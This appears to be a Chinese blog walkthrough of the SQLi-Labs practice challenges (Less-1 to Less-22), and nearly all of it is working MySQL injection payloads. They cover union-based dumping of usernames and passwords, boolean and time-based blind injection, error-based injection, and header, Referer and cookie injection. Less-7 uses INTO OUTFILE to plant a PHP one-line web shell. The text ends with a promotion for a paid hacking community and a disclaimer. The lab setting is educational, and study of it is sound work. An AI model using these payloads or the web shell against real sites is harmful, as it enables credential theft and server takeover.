【SQLi_Labs】Basic Challenges

什么是人生?人生就是永不休止的奋斗!

Less-1

尝试添加'注入,发现报错

这里我们就可以直接发现报错的地方,直接将后面注释,然后使用

1' order by 3%23

//得到列数为3

//这里用-1是为了查询一个不存在的id,好让第一句结果为空,直接显示第二句的结果

-1' union select 1,2,group_concat(schema_name) from information_schema.schemata%23

//得到数据库名

//得到表名

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema= 'security'%23

如下

//得到列名

-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name= 'users'%23

如下

//爆破得到数据

-1' union select 1,username,password from users where id=3%23

如下

Less-2

在添加'之后,得到返回

可以得到这个sql语句其实并没有单引号,只是用数字进行查询,例如

select * from users where id=1

所以我们也可以跟上面一样,payloads:

-1 or 1=1%23

如下

Less-3

添加'之后,返回

可以得到大概的sql语句:

select * from users where id=('input') LIMIT 0,1;

所以我们可以需要闭合)。

-1') or 1=1%23

如下

Less-4

尝试'并未发现报错,尝试"发现报错

可以得到大概的sql语句

select * from users where id = ("input") LIMIT 0,1;

所以payload:

-1") or 1=1 %23

如下

Less-5

尝试'发现报错

猜测sql语句为

select * from users where id='input' LIMIT 0,1;

如果尝试之前的注入方法,会发现不再会返回我们注入的信息,如果注入成功的话,页面会返回You are in...,出错的话就不会返回这个字符串,所以这里我们可以进行盲注。

使用left()

例如我们可以使用1' and left(version(),1)=3%23这个payload进行测试,截取version()得到的最左侧的字符判断是否为3,如果为3则正常返回You are in...,否则不返回。

所以我们可以利用这个一步一步爆破得到1' and left(version(),1)=5%23。爆破区间可以确定在/[0-9.]/。

采用1'and length(database())=8%23对数据库名字长度进行爆破,确定数据库名字长度之后,我们可以使用database()来进行爆破数据库名,采用1' and left(database(),1)>'a'%23这个payload进行测试,原理跟上述一致,看返回即可,直到截取长度与数据库名字一致为止,这里效率比较高的就是采用二分法进行盲注。

使用substr()、ascii()

也可以采用substr()、ascii()函数进行尝试:

1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>80%23 //截取数据库下第一个表的

第一个字符与80ascii值进行对比 找第二个字符只需要改成substr('xxx',2,1)即可。 找第二个表改成limit 1,1

使用regexp()

1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1)%23 //users表中的列名是否有us**的列

使用ord()、mid()

1' and ORD(MID((SELECT IFNULL(CAST(username AS CHAR),0x20)FROM security.users ORDER BY id LIMIT 0,1),1,1))= 68%23 //cast(username AS CHAR)将username转换成字符串

//IFNULL(exp1,exp2)假如expr1不为NULL,则IFNULL()的返回值为expr1; 否则其返回值为expr2。IFNULL()的返回值是数字或是字符串,具体情况取决于其所使用的语境。 //ord将某个字符转换成ascii码,同ascii()

使用报错注入

Mysql报错注入原理分析(count()、rand()、group by)

超链接:https://www.cnblogs.com/xdans/p/5412468.html

复制代码
1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+
复制代码
1' union select 1,count(*) ,concat((select user()),floor(rand(0)*2))x from security.users group by x%23

1' union select (exp(~(select * FROM(SELECT USER())a))),2, 3--+ //exp报错

1' union select (!(select * from (select user())x)- ~0),2,3--+ //bigint 溢出报错注入(这个单引号是微软拼音的中文单引号)

1' and extractvalue(1,concat(0x7e,(select @@version),0x7e)) --+ //xpath报错注入

1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) --+ //xpath报错注入

1' union select 1,2,3 from (select NAME_CONST(version(),1), NAME_CONST(version(),1))x --+

使用延时注入

benchmark 是Mysql的一个内置函数,其作用是来测试一些函数的执行速度。benchmark() 中带有两个参数,第一个是执行的次数,第二个是要执行的函数或者是表达式

1'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+

Less-6

没有回显,可以使用布尔盲注

1" and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100--+

可以发现>100有回显,小于就没有,也可以用报错注入...

这里就是把Less-5 中的'改成"就行了

Less-7

使用文件导出,通过第Less-5的报错注入出绝对路径

1' and updatexml(1,concat(0x7e,(select @@datadir),0x7e),1) --+

1'))UNION SELECT 1,2,3 into outfile "c:\wamp\www\sqlli b\Less-7\uuu.txt"%23

上图中显示 sql 出错了,但是没有关系,我们可以在文件中看到 uuu.txt 已经生成了

1'))UNION SELECT 1,2,'<?php @eval($_post["mima"])?>' into outfile "c:\wamp\www\sqllib\Less-7\yijuhua.php"--+

可以在文件中看到一句话木马已经导入进去了

Less-8

可以使用时间盲注,也可以用 bool 盲注

1' and If(ascii(substr(database(),1,1))>115,1,sleep(5))--+

Less-9

同 Less-8 可以使用时间盲注

1' and If(ascii(substr(database(),1,1))>115,1,sleep(5))--+

Less-10

1" and If(ascii(substr(database(),1,1))>115,1,sleep(5))--+

Less-11

报错注入,少一列就行了

复制代码
1' union Select count(*),concat(0x3a,0x3a,(select group_concat(schema_name) from information_schema.schemata),0x3a,0x3a,floor(rand(0)*2))a from information_schema.schemata group by a#
复制代码
1' union select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.columns group by x#

Less-12

复制代码
1") union Select count(*),concat(0x3a,0x3a,(select group_concat(schema_name) from information_schema.schemata),0x3a,0x3a,floor(rand(0)*2))a from information_schema.schemata group by a#
复制代码
1") union select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.columns group by x#

Less-13

1') or 1=1#

成功登录,报错注入成功但是不回显,可以考虑盲注

1') or ascii(substr((database()),1,1))>100#

Less-14

1" or 1=1#

成功登录,依然不能回显,尝试使用布尔盲注

1" or left(database(),1)='s'#

发现可以用updatexml进行报错注入

1" and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#

Less-15

1' or 1=1#

成功登录,布尔注入或者时间盲注均可行

1' or left(database(),1)='s'#

admin' and If(ascii(substr(database(),1,1))>115,1,sleep(5))#

Less-16

1") or 1=1#

成功登录,布尔注入或者时间盲注均可行

1") or left(database(),1)='s'#

admin") and If(ascii(substr(database(),1,1))>115,1,sleep(5))#

Less-17

update注入,username过滤了很多,有password错误回显,考虑用报错注入

username=admin

password=1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)#

Less-18

登录成功后,页面提示

那么有可能是 ip 或者 UA 注入,看了一下发现是个 Header 头注入,这里需要注意这是登录成功的条件下才能触发的,而且既然是insert注入,需要用'1'='1闭合后面的 sql 语句,否则就是语法错误了

' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and '1'='1

' and updatexml(1,concat(0x7e,(select @@version),0x7e),1),"1","1")#

Less-19

登录成功后提示

于是我们可以知道是在Referer应该有注入点,在 Referer 处同样用

' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and '1'='1

可以注入

Less-20

cookie 注入,登录成功后修改 cookie 即可,注意删除post的参数

uname=' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and '1'='1

Less-21

登录成功后发现 cookie 加上了 base64

YOUR COOKIE : uname = YWRtaW4=

用上面的 payload 进行 base64 编码就行了,记得=要 urlencode

JyBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQHZlcnNpb24pLDB4N2UpLDEpIGFuZCAnMSc9JzE%3d

Less-22

同 21 ,单引号换成双引号即可

IiBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBAQHZlcnNpb24pLDB4N2UpLDEpIGFuZCAiMSI9IjE%3d

本文poc、工具、源码加圈获取

复制代码
1、本圈主要分享:攻防及SRC实战经验分享、代码审计漏洞详情及代码、最新漏洞详情及原创漏洞利用工具、免杀手法及工具代码、问题解答等。
2、圈主出身于深信服深蓝攻防实验室、新华三攻防实验室,连续5年多次获得国家级、省级、地市级、行业级护网攻击队前三名。
3、漏洞盒子总榜前五十名、补天总榜前五十名、去哪网SRC总榜前五十名。
4、获得50+CVE通用漏洞编号、100+CNVD通用漏洞证书。
5、CSDN、公众号、博客、先知社区、SecIN、FreeBuf粉丝量10000+。
6、前1-50名: 25¥,50-100名: 50¥,100-150名: 75¥,依次类推.....!

知识星球

纷传

文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:儒道易行 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

相关推荐
甜甜的资料库22 分钟前
基于微信小程序的睡眠宝系统源码数据库文档
数据库·微信小程序·小程序
代码老y33 分钟前
Redis:现代应用开发的高效内存数据存储利器
数据库·redis·缓存
远方16091 小时前
15-Oracle 23ai Vector Search Similarity Search-向量相似性和混合搜索-实操
数据库·ai·oracle
zz0723201 小时前
第二十周:Redis(二)
数据库·redis·缓存
杨超越luckly2 小时前
“详规一张图”——新加坡土地利用数据
前端·数据库·arcgis·信息可视化·数据分析
NineData2 小时前
NineData数据库DevOps功能全面支持百度智能云向量数据库 VectorDB
数据库·人工智能·mysql
TDengine (老段)3 小时前
TDengine 开发指南—— UDF函数
java·大数据·数据库·物联网·数据分析·tdengine·涛思数据
Waloo3 小时前
STUFF 函数
数据库·sql server
?ccc?4 小时前
MySQL故障排查与生产环境优化
数据库·mysql
零叹4 小时前
篇章二 论坛系统——系统设计
数据库·数据库设计·技术选型·表的设计